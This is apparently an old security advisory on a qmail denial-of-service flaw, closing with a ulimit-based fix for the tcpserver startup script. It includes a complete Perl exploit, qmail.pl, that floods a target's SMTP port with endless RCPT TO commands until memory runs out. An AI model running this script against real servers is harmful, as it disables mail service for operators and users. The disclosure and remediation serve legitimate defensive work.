COMMAND

    qmail

SYSTEMS AFFECTED

    Systems running qmail

PROBLEM

    Wietse Venema  found following  a very  trivial denial  of service
    attack. By sending SMTP commands of unlimited length, an  attacker
    can  make  the  machine  run  out  of  memory,  thus  rendering it
    completely unusable.

    Below is a  little program that  demonstrates the problem.   It is
    written as PERL program by super.  Exploit follows.

    ----------------------------- qmail.pl --------------------------
    #!/usr/local/bin/perl -w
    # $Id: qmail.pl,v 1.4 1997/06/12 02:12:42 super Exp $
    require 5.002;
    use strict;
    use Socket;
    if(!($ARGV[0])){print("usage: $0 FQDN","\n");exit;}
    my $port = 25; my $proto = getprotobyname("tcp");
    my $iaddr = inet_aton($ARGV[0]) || die "No such host: $ARGV[0]";
    my $paddr = sockaddr_in($port, $iaddr);
    socket(SKT, AF_INET, SOCK_STREAM, $proto) || die "socket() $!";
    connect(SKT, $paddr) && print("Connected established.\n") || die "connect() $!";
    send(SKT,"mail from: <me\@me>\n",0) || die "send() $!";
    my $infstr = "rcpt to: <me\@" . $ARGV[0] . ">\n"; print("Attacking..","\n");
    while(<SKT>){
    send(SKT,$infstr,0) || die "send() $!";
    }
    die "Connection lost!";
    -------------------------- qmail.pl ------------------------------

SOLUTION

    Put  some  upper  bound  on  the  amount  of data that qmail-smtpd
    reads per command.

    If you  are using  tcpserver it  should be  sufficient to  set the
    ulimit once in the startup  script.  All instances of  qmail-smtpd
    inherit the limit without further  overhead.  Seems to be  working
    fine here.

    echo "Starting tcpserver for qmail-smtpd..."
    ulimit -d 2048
    /usr/local/bin/tcpserver -v -u 61 -g 61 0 smtp /usr/local/bin/tcpcontrol \
        /etc/tcp.smtp.cdb /var/qmail/bin/qmail-smtpd 2>&1 | \
        /var/qmail/bin/splogger smtpd 3 &